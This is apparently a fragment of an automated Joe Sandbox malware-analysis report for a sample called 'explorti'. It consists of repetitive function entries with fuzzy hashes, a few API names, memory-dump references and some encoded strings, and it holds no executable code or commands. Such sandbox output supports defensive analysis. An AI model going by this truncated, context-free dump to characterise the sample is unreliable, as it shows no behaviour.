                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction ID: d07a577995ff0b7ff3e1a3e13b6d2aec4fb5a8a85d417c19c616c14632494941
                      • Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
                      • Instruction Fuzzy Hash: 08F14F71E002199FDF14CFA9D8806AEBBB5FF88314F15826DD819AB345D731AE41DB90
                      APIs
                      • GetSystemTimePreciseAsFileTime.KERNEL32(?,0054CE82,?,?,?,?,0054CEB7,?,?,?,?,?,?,0054C42D,?,00000001), ref: 0054CB33
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FilePreciseSystem
                      • String ID:
                      • API String ID: 1802150274-0
                      • Opcode ID: 3cd3c0053212a62e8a8d2ec16c8ce1759104ead8645ed1a9678c0b570b5cdd32
                      • Instruction ID: ff36873678f57f410fc9034a211986b2b42af44e1f7bc77a5709b3f7fca6a0b9
                      • Opcode Fuzzy Hash: 3cd3c0053212a62e8a8d2ec16c8ce1759104ead8645ed1a9678c0b570b5cdd32
                      • Instruction Fuzzy Hash: DAD0223260303C93CA422B90FC098ECBF08EE44B643800112ED0563130CE505C046BE0
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 0
                      • API String ID: 0-4108050209
                      • Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction ID: 3f65e85ea609609aa8550175612486759b8a67b564bd053418e708d8f727b7da
                      • Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
                      • Instruction Fuzzy Hash: D051687020C64D97DB388A3888997BEAFAEBF5D34CF140D59D442D7682DA139E8CC351
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e3da991177d42032d5dc01f9ea524cb0a16ec247bcd2dd91d6dfe65b42494535
                      • Instruction ID: cc516eef2e1c9903ec396a63165425ef28b043a00289d1d91b85dda8ed7b4b4c
                      • Opcode Fuzzy Hash: e3da991177d42032d5dc01f9ea524cb0a16ec247bcd2dd91d6dfe65b42494535
                      • Instruction Fuzzy Hash: F92260B3F515145BDB0CCB9DDCA27ECB2E3AFD8214B0E803DA40AE3345EA79D9159A44
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 344d85a18966a46fd8507da58bb7900ca3d6ccd56fa0e8d39a21affcec630c26
                      • Instruction ID: 943884ca97cd4821474b2e86d647850f59c178a65e2c447d01674025299c15fc
                      • Opcode Fuzzy Hash: 344d85a18966a46fd8507da58bb7900ca3d6ccd56fa0e8d39a21affcec630c26
                      • Instruction Fuzzy Hash: 98B159312146099FD715CF28E48AB657FA0FF49364F65C658E899CF2A1C335E982DF40
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c951f7ba04e513b2208ab3c1e6991cac91e5eb32041349af697f8eda80f47fe5
                      • Instruction ID: 832b811bcd86a2b0e0d6b785de3200f135156cb6c7021b5a2001b17d7555247e
                      • Opcode Fuzzy Hash: c951f7ba04e513b2208ab3c1e6991cac91e5eb32041349af697f8eda80f47fe5
                      • Instruction Fuzzy Hash: FB519F756083918FD319CF29841523ABFE1BFD5200F084A9EE5E697252D774E908CB91
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6f49757d141c197abb65cb18ad528de05f6bb359b148d4e7f7ca42e746432d4c
                      • Instruction ID: ad6bd70ba804746c12dd29cd33b4cb53a33dd2b59d23c32ac525a5cae4aa8506
                      • Opcode Fuzzy Hash: 6f49757d141c197abb65cb18ad528de05f6bb359b148d4e7f7ca42e746432d4c
                      • Instruction Fuzzy Hash: 8421B673F204394B770CC47ECC5727DB6E1C68C541745823AE8A6EA2C1D968D917E2E4
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9fd7d2ceab70894c43f193936df916108c7fba7e2b76651c1882a889179111e4
                      • Instruction ID: 173eecc7c5f441620f74895231ff4392ea271dddb0baa4f3ea0d10d9c42565cd
                      • Opcode Fuzzy Hash: 9fd7d2ceab70894c43f193936df916108c7fba7e2b76651c1882a889179111e4
                      • Instruction Fuzzy Hash: 6B117723F30C295A675C816D8C1727AA5D2EBD825071F533AD826E7284E994DE23D290
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction ID: d73408d51f88ae6cc87502d37a66309026a74d825df9996abd1052c1950dc5ea
                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                      • Instruction Fuzzy Hash: 8611E97728014147D60C8A2DF9FC6B6AF95FBD532173CC375D04B4B658D9239945F500
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 41183a75b3007f415a38fc604c9a813db706a68bb15cab6f374b62009b7f83d1
                      • Instruction ID: 5dc0e172ae0ce48884c76ba8b84c57ddead7e3dfdd219530efe184c6f97aa59c
                      • Opcode Fuzzy Hash: 41183a75b3007f415a38fc604c9a813db706a68bb15cab6f374b62009b7f83d1
                      • Instruction Fuzzy Hash: 05E08C3025064CAFCF257B18C88DD893F9AFF92342F004804F80447221CFB9ED81C990
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction ID: c6eb183c1e861535601e97b3162a86daa0ef2eaaf3be23fecbb64923ca252167
                      • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                      • Instruction Fuzzy Hash: 5EE0B672A15228EBCB15DB98894898AF6ACFB8AB50F554496B501E3252C370DF40CBD1
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 246122658369$6JLUcxtnEx==$Dy==$FAml$UFy=$invalid stoi argument$stoi argument out of range
                      • API String ID: 0-3273830296
                      • Opcode ID: d852f890f0febe04308ab8fe4f57bec39b744bc194beac1b6964f5a65814f141
                      • Instruction ID: dcdcaee6496786797f8d61773f3fff1746702a13cb8323dc7effee06624af3a3
                      • Opcode Fuzzy Hash: d852f890f0febe04308ab8fe4f57bec39b744bc194beac1b6964f5a65814f141
                      • Instruction Fuzzy Hash: C002BF70900249EBEF14EFA8C859BDEBFB5FF45308F504558E805A7282D7759A88CFA1
                      APIs
                      • _ValidateLocalCookies.LIBCMT ref: 005647A7
                      • ___except_validate_context_record.LIBVCRUNTIME ref: 005647AF
                      • _ValidateLocalCookies.LIBCMT ref: 00564838
                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00564863
                      • _ValidateLocalCookies.LIBCMT ref: 005648B8
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                      • String ID: csm
                      • API String ID: 1170836740-1018135373
                      • Opcode ID: 807fd5c3d913892f8b65c2faecd8832b480821a8f6154c35048ddaa15308f9db
                      • Instruction ID: 914c625e643e9b368237e661de5437037b5e1deffc1dc951c2ec3271805e86c4
                      • Opcode Fuzzy Hash: 807fd5c3d913892f8b65c2faecd8832b480821a8f6154c35048ddaa15308f9db
                      • Instruction Fuzzy Hash: 6F51B534A00249ABCF10DF68D885AAE7FB5FF56314F148195E8189B352D732EE15CF90
                      APIs
                      • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 0054795C
                      • __Cnd_destroy_in_situ.LIBCPMT ref: 00547968
                      • __Mtx_destroy_in_situ.LIBCPMT ref: 00547971
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932710524.00000000009E3000.00000080.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_6_2_530000_explorti.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                      • String ID: 'kTd+Y$@yT$d+Y
                      • API String ID: 4078500453-4208207514
                      • Opcode ID: 2918505d775dcfc5b1f805d9796c1a38feef77dadd7dfabca71abb0204c8b1a4
                      • Instruction ID: bd88afcc97bfe0b6ae04e93c3998b51f0d628f96e6335d16141c1194a1b5e5c6
                      • Opcode Fuzzy Hash: 2918505d775dcfc5b1f805d9796c1a38feef77dadd7dfabca71abb0204c8b1a4
                      • Instruction Fuzzy Hash: C131E5B19047099BD720DF64D849AAABFE8FF58314F000A2EF945C7252E771EA54C7A1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, Offset: 00530000, based on PE: true
                      • Associated: 00000006.00000002.2931495918.0000000000530000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931526635.0000000000592000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931612690.0000000000599000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000059B000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000802000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.000000000082D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000835000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2931636167.0000000000843000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932002911.0000000000844000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000006.00000002.2932686648.00000000009E1000.00000040.00000001.01000000.00000008.sdmpDownload File
